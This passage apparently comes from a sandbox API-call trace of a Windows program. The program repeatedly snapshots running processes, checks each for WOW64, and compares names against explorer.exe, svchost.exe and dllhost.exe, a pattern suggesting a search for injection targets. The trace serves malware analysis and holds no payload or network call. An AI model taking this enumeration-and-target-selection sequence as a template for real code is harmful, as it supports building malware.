th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0226.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0226.156] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.156] CloseHandle (hObject=0xd8) returned 1 [0226.156] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0226.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0226.157] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.157] CloseHandle (hObject=0xd8) returned 1 [0226.157] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0226.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0226.157] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.157] CloseHandle (hObject=0xd8) returned 1 [0226.157] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0226.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0226.158] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.158] CloseHandle (hObject=0xd8) returned 1 [0226.158] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0226.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0226.158] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.158] CloseHandle (hObject=0xd8) returned 1 [0226.158] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0226.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0226.159] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.159] CloseHandle (hObject=0xd8) returned 1 [0226.159] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0226.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0226.160] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0226.160] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0226.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0226.161] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0226.161] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0226.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0226.162] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0226.162] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.162] CloseHandle (hObject=0xd8) returned 1 [0226.162] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0226.162] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0226.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0226.163] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.163] CloseHandle (hObject=0xd8) returned 1 [0226.163] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0226.163] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0226.163] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0226.163] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0226.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0226.163] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0226.164] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.164] CloseHandle (hObject=0xd8) returned 1 [0226.164] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0226.165] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.165] CloseHandle (hObject=0xd8) returned 1 [0226.165] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0226.165] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0226.165] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.165] CloseHandle (hObject=0xd8) returned 1 [0226.165] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.166] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0226.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0226.166] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.166] CloseHandle (hObject=0xd8) returned 1 [0226.166] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0226.167] CloseHandle (hObject=0xd4) returned 1 [0226.167] Sleep (dwMilliseconds=0x3e8) [0227.200] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0227.202] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0227.202] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0227.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0227.203] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0227.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0227.203] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0227.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0227.204] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0227.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0227.204] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0227.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0227.205] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0227.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0227.205] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0227.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0227.206] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0227.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0227.206] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0227.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0227.207] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0227.207] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0227.208] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0227.209] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0227.209] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0227.210] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0227.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0227.211] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0227.211] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0227.212] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0227.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0227.212] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.212] CloseHandle (hObject=0xd8) returned 1 [0227.213] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0227.213] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0227.213] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0227.213] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0227.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0227.213] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0227.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0227.214] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.214] CloseHandle (hObject=0xd8) returned 1 [0227.214] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0227.214] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0227.214] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0227.214] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0227.215] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0227.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0227.215] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0227.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0227.216] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.216] CloseHandle (hObject=0xd8) returned 1 [0227.216] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0227.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0227.217] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.217] CloseHandle (hObject=0xd8) returned 1 [0227.217] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0227.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0227.217] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.217] CloseHandle (hObject=0xd8) returned 1 [0227.218] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0227.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0227.218] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.218] CloseHandle (hObject=0xd8) returned 1 [0227.218] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0227.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0227.219] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.219] CloseHandle (hObject=0xd8) returned 1 [0227.219] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0227.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0227.220] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.220] CloseHandle (hObject=0xd8) returned 1 [0227.220] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0227.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0227.220] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.220] CloseHandle (hObject=0xd8) returned 1 [0227.220] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0227.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0227.221] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.221] CloseHandle (hObject=0xd8) returned 1 [0227.221] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0227.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0227.222] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.222] CloseHandle (hObject=0xd8) returned 1 [0227.222] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0227.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0227.222] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.222] CloseHandle (hObject=0xd8) returned 1 [0227.223] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, 